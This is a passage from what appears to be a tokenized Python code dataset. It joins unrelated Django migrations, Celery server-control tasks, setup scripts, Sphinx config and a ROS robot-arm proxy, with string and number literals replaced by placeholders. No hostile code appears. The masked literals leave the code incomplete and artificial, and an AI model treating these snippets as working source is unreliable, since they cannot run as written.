            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT:value>': ('<STR_LIT>', [], {})
        }
    }

    complete_apps = ['<STR_LIT>']
<s> import os <EOL> from datetime import timedelta <EOL> from subprocess import Popen <EOL> from celery import task <EOL> from django . contrib . auth . models import User <EOL> from django . utils import timezone <EOL> from mod . models import TaskEvent <EOL> from settings import MEDIA_ROOT , SERVER_EXEC <EOL> @ task ( ) <EOL> def run_server ( path , server ) : <EOL> log_path = os . path . join ( MEDIA_ROOT , '<STR_LIT>' , server . owner . username , server . mod . title ) <EOL> if not os . path . exists ( log_path ) : <EOL> os . makedirs ( log_path ) <EOL> with open ( os . path . join ( log_path , '<STR_LIT>' . format ( server . id , timezone . now ( ) . strftime ( "<STR_LIT>" ) , User . objects . make_random_password ( ) ) ) , '<STR_LIT:w>' ) as f : <EOL> p = Popen ( ( os . path . join ( path , SERVER_EXEC ) , '<STR_LIT>' , os . path . join ( path , '<STR_LIT>' , server . owner . username , '<STR_LIT>' . format ( server . id ) , server . random_key , '<STR_LIT>' ) ) , cwd = path , stdout = f , stderr = f ) <EOL> server . pid = p . pid <EOL> server . online = True <EOL> server . locked = False <EOL> server . save ( ) <EOL> @ task ( ) <EOL> def check_server_state ( ) : <EOL> from mod . models import Server <EOL> servers = Server . active . filter ( is_active = True ) <EOL> for server in servers : <EOL> old_is_online = server . is_online <EOL> if not server . is_online and server . set_online_at >= timezone . now ( ) - timedelta ( seconds = <NUM_LIT:10> ) : <EOL> server . locked = False <EOL> server . save ( ) <EOL> server . check_online ( ) <EOL> server . get_server_info ( ) <EOL> if server . automatic_restart and old_is_online and not server . is_online : <EOL> server . set_online ( ) <EOL> @ task ( ) <EOL> def start_server ( event_id ) : <EOL> event = TaskEvent . objects . filter ( pk = event_id ) <EOL> if event : <EOL> event = event [ <NUM_LIT:0> ] <EOL> else : <EOL> return <EOL> event . server . set_online ( ) <EOL> if not event . repeat : <EOL> event . 
status = <NUM_LIT:2> <EOL> event . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> else : <EOL> next_run = event . date + timedelta ( minutes = event . repeat ) <EOL> if timezone . now ( ) >= next_run : <EOL> event . status = <NUM_LIT:2> <EOL> event . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> return <EOL> task = start_server . apply_async ( ( event_id , ) , eta = next_run ) <EOL> event . date = next_run <EOL> event . task_id = task . task_id <EOL> event . save ( update_fields = [ '<STR_LIT:date>' , '<STR_LIT>' ] ) <EOL> @ task ( ) <EOL> def stop_server ( event_id ) : <EOL> event = TaskEvent . objects . filter ( pk = event_id ) <EOL> if event : <EOL> event = event [ <NUM_LIT:0> ] <EOL> else : <EOL> return <EOL> event . server . set_offline ( ) <EOL> if not event . repeat : <EOL> event . status = <NUM_LIT:2> <EOL> event . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> else : <EOL> next_run = event . date + timedelta ( minutes = event . repeat ) <EOL> if timezone . now ( ) >= next_run : <EOL> event . status = <NUM_LIT:2> <EOL> event . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> return <EOL> task = stop_server . apply_async ( ( event_id , ) , eta = next_run ) <EOL> event . date = next_run <EOL> event . task_id = task . task_id <EOL> event . save ( update_fields = [ '<STR_LIT:date>' , '<STR_LIT>' ] ) <EOL> @ task ( ) <EOL> def restart_server ( event_id ) : <EOL> event = TaskEvent . objects . filter ( pk = event_id ) <EOL> if event : <EOL> event = event [ <NUM_LIT:0> ] <EOL> else : <EOL> return <EOL> if event . server . is_online : <EOL> event . server . set_offline ( ) <EOL> event . server . set_online ( ) <EOL> if not event . repeat : <EOL> event . status = <NUM_LIT:2> <EOL> event . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> else : <EOL> next_run = event . date + timedelta ( minutes = event . repeat ) <EOL> if timezone . now ( ) >= next_run : <EOL> event . status = <NUM_LIT:2> <EOL> event . 
save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> return <EOL> task = restart_server . apply_async ( ( event_id , ) , eta = next_run ) <EOL> event . date = next_run <EOL> event . task_id = task . task_id <EOL> event . save ( update_fields = [ '<STR_LIT:date>' , '<STR_LIT>' ] ) </s>
<s> import autocomplete_light . shortcuts as al <EOL> from models import * <EOL> class AuthorityAutocomplete ( al . AutocompleteModelBase ) : <EOL> """<STR_LIT>""" <EOL> choice_html_format = u'''<STR_LIT>''' <EOL> def choice_html ( self , choice ) : <EOL> return self . choice_html_format % ( self . choice_value ( choice ) , self . choice_label ( choice ) , choice . description ) <EOL> search_fields = [ '<STR_LIT>' , ] <EOL> autocomplete_js_attributes = { <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } <EOL> widget_js_attributes = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } <EOL> al . register ( Authority , AuthorityAutocomplete ) <EOL> al . register ( Language , <EOL> search_fields = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> attrs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } , <EOL> widget_attrs = { <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> } , <EOL> ) <EOL> al . register ( Citation , <EOL> search_fields = [ '<STR_LIT>' , ] , <EOL> attrs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } , <EOL> widget_attrs = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> } , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> import django . db . models . deletion <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( blank = True , null = True , on_delete = django . db . models . deletion . CASCADE , to = '<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
from __future__ import unicode_literals

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):
    """Initial migration: creates the app's models, then wires up their FKs.

    Auto-generated by `makemigrations`; the CreateModel/AddField operations
    below are declarative data and should not be edited by hand.
    """

    initial = True

    dependencies = [
        ('<STR_LIT>', '<STR_LIT>'),
        # The user FKs below target whatever AUTH_USER_MODEL is configured.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT:id>', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='<STR_LIT>')),
                ('<STR_LIT>', models.DateTimeField(auto_now_add=True)),
                ('<STR_LIT>', models.BooleanField(default=False, help_text='<STR_LIT>')),
                ('<STR_LIT>', models.CharField(max_length=<NUM_LIT:2>)),
                ('<STR_LIT>', models.CharField(max_length=<NUM_LIT:2>)),
            ],
            options={
                '<STR_LIT>': False,
            },
        ),
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT:id>', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='<STR_LIT>')),
                ('<STR_LIT>', models.DateTimeField(auto_now_add=True)),
                ('<STR_LIT>', models.BooleanField(default=False, help_text='<STR_LIT>')),
                ('<STR_LIT:name>', models.CharField(max_length=<NUM_LIT:255>)),
                ('<STR_LIT:value>', models.CharField(max_length=<NUM_LIT:255>)),
            ],
            options={
                '<STR_LIT>': False,
            },
        ),
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT:id>', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='<STR_LIT>')),
                ('<STR_LIT>', models.DateTimeField(auto_now_add=True)),
                ('<STR_LIT>', models.BooleanField(default=False, help_text='<STR_LIT>')),
                ('<STR_LIT:name>', models.CharField(max_length=<NUM_LIT:1000>)),
                ('<STR_LIT>', models.CharField(blank=True, max_length=<NUM_LIT:255>, null=True)),
                ('<STR_LIT>', models.CharField(blank=True, max_length=<NUM_LIT:255>, null=True)),
                ('<STR_LIT>', models.CharField(blank=True, max_length=<NUM_LIT:255>, null=True)),
                ('<STR_LIT>', models.CharField(blank=True, max_length=<NUM_LIT:2>, null=True)),
                ('<STR_LIT>', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                '<STR_LIT>': False,
            },
        ),
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT:id>', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='<STR_LIT>')),
                ('<STR_LIT>', models.DateTimeField(auto_now_add=True)),
                ('<STR_LIT>', models.BooleanField(default=False, help_text='<STR_LIT>')),
                ('<STR_LIT:name>', models.CharField(max_length=<NUM_LIT:255>)),
                ('<STR_LIT:value>', models.CharField(max_length=<NUM_LIT:255>)),
                ('<STR_LIT>', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='<STR_LIT>', to='<STR_LIT>')),
                ('<STR_LIT>', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                '<STR_LIT>': False,
            },
        ),
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT:id>', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='<STR_LIT>')),
                ('<STR_LIT>', models.DateTimeField(auto_now_add=True)),
                ('<STR_LIT>', models.BooleanField(default=False, help_text='<STR_LIT>')),
                ('<STR_LIT:title>', models.CharField(blank=True, max_length=<NUM_LIT:1000>, null=True)),
                ('<STR_LIT:description>', models.TextField(blank=True, null=True)),
                ('<STR_LIT>', models.TextField(blank=True, null=True)),
                ('<STR_LIT>', models.CharField(blank=True, max_length=<NUM_LIT:2>, null=True)),
                ('<STR_LIT>', models.CharField(blank=True, max_length=<NUM_LIT:100>, null=True)),
                ('<STR_LIT>', models.CharField(blank=True, max_length=<NUM_LIT:10>, null=True)),
                ('<STR_LIT>', models.CharField(blank=True, max_length=<NUM_LIT:10>, null=True)),
                ('<STR_LIT>', models.CharField(blank=True, max_length=<NUM_LIT:10>, null=True)),
                ('<STR_LIT>', models.CharField(blank=True, max_length=<NUM_LIT:10>, null=True)),
                ('<STR_LIT>', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                '<STR_LIT>': False,
            },
        ),
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT:id>', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='<STR_LIT>')),
                ('<STR_LIT>', models.DateTimeField(auto_now_add=True)),
                ('<STR_LIT>', models.BooleanField(default=False, help_text='<STR_LIT>')),
                ('<STR_LIT:name>', models.CharField(max_length=<NUM_LIT:255>)),
                ('<STR_LIT:value>', models.CharField(max_length=<NUM_LIT:255>)),
                ('<STR_LIT>', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='<STR_LIT>', to='<STR_LIT>')),
                ('<STR_LIT>', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                '<STR_LIT>': False,
            },
        ),
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT:id>', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='<STR_LIT>')),
                ('<STR_LIT>', models.CharField(max_length=<NUM_LIT:100>)),
                ('<STR_LIT>', models.CharField(max_length=<NUM_LIT:1000>)),
                ('<STR_LIT>', models.CharField(max_length=<NUM_LIT:1000>)),
                ('<STR_LIT>', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='<STR_LIT>', to='<STR_LIT>')),
            ],
        ),
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT:id>', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='<STR_LIT>')),
                ('<STR_LIT>', models.DateTimeField(auto_now_add=True)),
                ('<STR_LIT:name>', models.CharField(max_length=<NUM_LIT:255>)),
                ('<STR_LIT>', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT:id>', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='<STR_LIT>')),
                ('<STR_LIT>', models.PositiveIntegerField()),
                ('<STR_LIT>', models.PositiveIntegerField()),
                ('<STR_LIT>', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='<STR_LIT>', to='<STR_LIT>')),
                ('<STR_LIT>', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='<STR_LIT>', to='<STR_LIT>')),
            ],
        ),
        # Remaining cross-model FKs added after all models exist.
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='<STR_LIT>'),
        ),
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='<STR_LIT>'),
        ),
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='<STR_LIT>'),
        ),
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='<STR_LIT>'),
        ),
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='<STR_LIT>', to='<STR_LIT>'),
        ),
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='<STR_LIT>'),
        ),
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='<STR_LIT>', to='<STR_LIT>'),
        ),
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='<STR_LIT>', to='<STR_LIT>'),
        ),
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='<STR_LIT>'),
        ),
    ]
<s> import requests <EOL> from django . core . management . base import BaseCommand <EOL> from django . core . files . uploadedfile import SimpleUploadedFile <EOL> from shop import api as shop_api <EOL> IMAGE_URL = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** options ) : <EOL> products = shop_api . list_products ( ) <EOL> for product in products : <EOL> url = IMAGE_URL . format ( ean = product . code ) <EOL> response = requests . get ( url ) <EOL> if response . status_code == <NUM_LIT:200> : <EOL> f = SimpleUploadedFile ( '<STR_LIT>' , response . content , <EOL> '<STR_LIT>' ) <EOL> shop_api . update_product ( product . id , image = f ) </s>
<s> import factory . fuzzy <EOL> from . . import models <EOL> class AccountFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = models . Account <EOL> card_id = factory . fuzzy . FuzzyInteger ( <NUM_LIT:0> , ( <NUM_LIT:1> << <NUM_LIT:32> ) - <NUM_LIT:1> ) </s>
<s> default_app_config = '<STR_LIT>' </s>
<s> from __future__ import with_statement , absolute_import <EOL> import os <EOL> stable_version = '<STR_LIT>' <EOL> target_version = '<STR_LIT>' <EOL> is_release = stable_version == target_version <EOL> try : <EOL> from setuptools import setup <EOL> has_setuptools = True <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> has_setuptools = False <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> os . chdir ( '<STR_LIT>' ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as f : <EOL> f . readline ( ) <EOL> this_version = f . readline ( ) . split ( ) [ - <NUM_LIT:1> ] . strip ( "<STR_LIT:'>" ) <EOL> os . chdir ( '<STR_LIT:..>' ) <EOL> elif stable_version == target_version : <EOL> this_version = target_version <EOL> else : <EOL> this_version = target_version + '<STR_LIT>' <EOL> if is_release : <EOL> from datetime import date <EOL> today = "<STR_LIT>" . join ( date . isoformat ( date . today ( ) ) . split ( '<STR_LIT:->' ) ) <EOL> this_version += "<STR_LIT:->" + today <EOL> with open ( '<STR_LIT>' ) as file : <EOL> license_text = file . read ( ) <EOL> long_description = """<STR_LIT>""" % { '<STR_LIT>' : stable_version , '<STR_LIT>' : this_version } <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as file : <EOL> file . write ( long_description ) <EOL> def write_info_py ( filename = '<STR_LIT>' ) : <EOL> contents = """<STR_LIT>""" <EOL> with open ( filename , '<STR_LIT:w>' ) as file : <EOL> file . write ( contents % { '<STR_LIT>' : this_version , <EOL> '<STR_LIT>' : stable_version , <EOL> '<STR_LIT>' : long_description , <EOL> '<STR_LIT>' : license_text } ) <EOL> return <EOL> write_info_py ( ) <EOL> setup_code = """<STR_LIT>""" % ( target_version , long_description ) <EOL> ctypes_version = '<STR_LIT>' <EOL> objgraph_version = '<STR_LIT>' <EOL> pyreadline_version = '<STR_LIT>' <EOL> import sys <EOL> if has_setuptools : <EOL> setup_code += """<STR_LIT>""" <EOL> if sys . 
platform [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> setup_code += """<STR_LIT>""" % ( pyreadline_version ) <EOL> elif hex ( sys . hexversion ) < '<STR_LIT>' : <EOL> setup_code += """<STR_LIT>""" % ( ctypes_version ) <EOL> setup_code += """<STR_LIT>""" <EOL> exec ( setup_code ) <EOL> try : <EOL> import ctypes <EOL> import readline <EOL> except ImportError : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" % ctypes_version ) <EOL> if sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> print ( "<STR_LIT>" % pyreadline_version ) <EOL> print ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> pass </s>
<s> import djgunicorn <EOL> from setuptools import setup , find_packages <EOL> version = djgunicorn . __version__ <EOL> with open ( '<STR_LIT>' ) as f : <EOL> readme = f . read ( ) <EOL> with open ( '<STR_LIT>' ) as f : <EOL> history = f . read ( ) <EOL> with open ( '<STR_LIT>' ) as f : <EOL> install_requires = f . read ( ) . strip ( ) . splitlines ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = """<STR_LIT>""" , <EOL> long_description = readme + '<STR_LIT>' + history , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> install_requires = install_requires , <EOL> license = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> keywords = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from . devicelist import ( <EOL> ChannelList , <EOL> ChannelInfo , <EOL> DevicePINInfo , <EOL> DeviceTokenList , <EOL> DevicePINList , <EOL> APIDList , <EOL> Feedback , <EOL> ) <EOL> from . tag import ( <EOL> TagList , <EOL> Tag , <EOL> DeleteTag , <EOL> BatchTag , <EOL> ) <EOL> from . segment import ( <EOL> Segment , <EOL> SegmentList <EOL> ) <EOL> from . channel_uninstall import ( <EOL> ChannelUninstall <EOL> ) <EOL> from . named_users import ( <EOL> NamedUser , <EOL> NamedUserList <EOL> ) </s>
<s> import logging <EOL> from gevent import Greenlet , sleep <EOL> from shaveet . config import MAX_CLIENTS_GC , CLIENT_GC_INTERVAL <EOL> from shaveet . lookup import all_clients , discard_client <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> class ClientGC ( Greenlet ) : <EOL> """<STR_LIT>""" <EOL> def run ( self ) : <EOL> while True : <EOL> logger . info ( "<STR_LIT>" ) <EOL> client_processed = <NUM_LIT:0> <EOL> for client_id , client in all_clients ( ) . iteritems ( ) : <EOL> if not client . is_active ( ) : <EOL> logger . debug ( "<STR_LIT>" , client . id , client . ts , client . is_waiting ) <EOL> discard_client ( client ) <EOL> client_processed += <NUM_LIT:1> <EOL> if client_processed % MAX_CLIENTS_GC == <NUM_LIT:0> : <EOL> sleep ( <NUM_LIT:0> ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> sleep ( CLIENT_GC_INTERVAL ) </s>
<s> import sys , os <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> intersphinx_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> } </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import copy <EOL> import rospy <EOL> import moveit_commander <EOL> from base_proxy import BaseProxy , ProxyCommand <EOL> from trajectory_msgs . msg import JointTrajectoryPoint <EOL> from control_msgs . msg import FollowJointTrajectoryAction , FollowJointTrajectoryGoal <EOL> import actionlib <EOL> class YoubotGazeboProxy ( BaseProxy ) : <EOL> arm_joint_names = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> gripper_joint_names = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> end_effector_link = "<STR_LIT>" <EOL> def __init__ ( self , node_name ) : <EOL> rospy . logdebug ( "<STR_LIT>" ) <EOL> super ( YoubotGazeboProxy , self ) . __init__ ( ) <EOL> self . init_done = False <EOL> rospy . init_node ( node_name , anonymous = True ) <EOL> rospy . loginfo ( "<STR_LIT>" + rospy . get_name ( ) ) <EOL> rospy . loginfo ( "<STR_LIT>" + rospy . get_namespace ( ) ) <EOL> rospy . loginfo ( "<STR_LIT>" + rospy . get_node_uri ( ) ) <EOL> self . arm_num = rospy . get_param ( "<STR_LIT>" ) <EOL> self . _arm_as_name = '<STR_LIT>' + str ( self . arm_num ) + '<STR_LIT>' <EOL> self . _gripper_as_name = '<STR_LIT>' + str ( self . arm_num ) + '<STR_LIT>' <EOL> try : <EOL> moveit_commander . roscpp_initialize ( sys . argv ) <EOL> self . arm_group = moveit_commander . MoveGroupCommander ( "<STR_LIT>" ) <EOL> self . arm_group . set_planning_time ( <NUM_LIT:8> ) <EOL> self . arm_group . set_pose_reference_frame ( "<STR_LIT>" ) <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> except : <EOL> pass <EOL> self . _ac_arm = actionlib . SimpleActionClient ( self . _arm_as_name , FollowJointTrajectoryAction ) <EOL> self . _ac_arm . wait_for_server ( ) <EOL> rospy . loginfo ( "<STR_LIT>" + self . _arm_as_name ) <EOL> self . _ac_gripper = actionlib . SimpleActionClient ( self . _gripper_as_name , FollowJointTrajectoryAction ) <EOL> self . _ac_gripper . wait_for_server ( ) <EOL> rospy . loginfo ( "<STR_LIT>" + self . _gripper_as_name ) <EOL> self . 
init_done = True <EOL> def plan_arm ( self , pose ) : <EOL> '''<STR_LIT>''' <EOL> if self . init_done == False : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . arm_group . clear_pose_targets ( ) <EOL> self . arm_group . set_pose_target ( pose , self . _end_effector_link ) <EOL> plan = self . arm_group . plan ( ) <EOL> if len ( plan . joint_trajectory . points ) == <NUM_LIT:0> : <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> self . _arm_goal = None <EOL> return False <EOL> else : <EOL> rospy . loginfo ( "<STR_LIT>" + str ( len ( plan . joint_trajectory . points ) ) ) <EOL> self . _arm_goal = FollowJointTrajectoryGoal ( ) <EOL> self . _arm_goal . trajectory = copy . deepcopy ( plan . joint_trajectory ) <EOL> return True <EOL> def move_arm ( self ) : <EOL> self . _ac_arm . send_goal ( self . _arm_goal , feedback_cb = self . move_arm_feedback_cb ) <EOL> self . _ac_arm . wait_for_result ( ) <EOL> return self . _ac_arm . get_result ( ) <EOL> def move_arm_feedback_cb ( self ) : pass <EOL> def move_gripper ( self , opening_mm ) : <EOL> goal = FollowJointTrajectoryGoal ( ) <EOL> goal . trajectory . joint_names = self . gripper_joint_names <EOL> jtp = JointTrajectoryPoint ( ) <EOL> jtp . positions = [ opening_mm / <NUM_LIT> , opening_mm / <NUM_LIT> ] <EOL> jtp . velocities = [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> jtp . time_from_start = rospy . Duration ( <NUM_LIT:1.0> ) <EOL> goal . trajectory . points . append ( jtp ) <EOL> self . _ac_gripper . send_goal ( goal ) <EOL> self . _ac_gripper . wait_for_result ( ) <EOL> return self . _ac_gripper . get_result ( ) <EOL> def control_loop ( self ) : <EOL> if self . commands is None : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> for cmd in self . commands : <EOL> self . wait_for_state ( self . _proxy_state_running ) <EOL> cmd_spec_str = None <EOL> spec = None <EOL> t = cmd [ ProxyCommand . key_command_type ] <EOL> if not ( t == "<STR_LIT>" ) : <EOL> cmd_spec_str = cmd [ ProxyCommand . 
key_command_spec ] <EOL> if not isinstance ( cmd_spec_str , basestring ) : <EOL> spec = float ( cmd_spec_str ) <EOL> else : <EOL> spec = self . positions [ cmd_spec_str ] <EOL> rospy . loginfo ( "<STR_LIT>" + t + "<STR_LIT>" + str ( cmd_spec_str ) + "<STR_LIT>" + str ( spec ) ) <EOL> self . wait_for_depend ( cmd ) <EOL> if t == '<STR_LIT>' : <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> self . wait_for_depend ( cmd ) <EOL> elif t == '<STR_LIT>' : <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> v = float ( spec ) <EOL> rospy . sleep ( v ) <EOL> elif t == '<STR_LIT>' : <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> self . move_gripper ( spec ) <EOL> elif t == '<STR_LIT>' : <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> rospy . logdebug ( spec ) <EOL> goal = FollowJointTrajectoryGoal ( ) <EOL> goal . trajectory . joint_names = self . arm_joint_names <EOL> jtp = JointTrajectoryPoint ( ) <EOL> jtp . time_from_start = rospy . Duration ( <NUM_LIT:0.5> ) <EOL> jtp . positions = spec <EOL> jtp . velocities = [ <NUM_LIT:0> ] * len ( spec ) <EOL> goal . trajectory . points . append ( jtp ) <EOL> self . _arm_goal = copy . deepcopy ( goal ) <EOL> self . move_arm ( ) <EOL> elif t == '<STR_LIT>' : <EOL> rospy . loginfo ( "<STR_LIT>" ) <EOL> raise NotImplementedError ( ) <EOL> else : <EOL> raise Exception ( 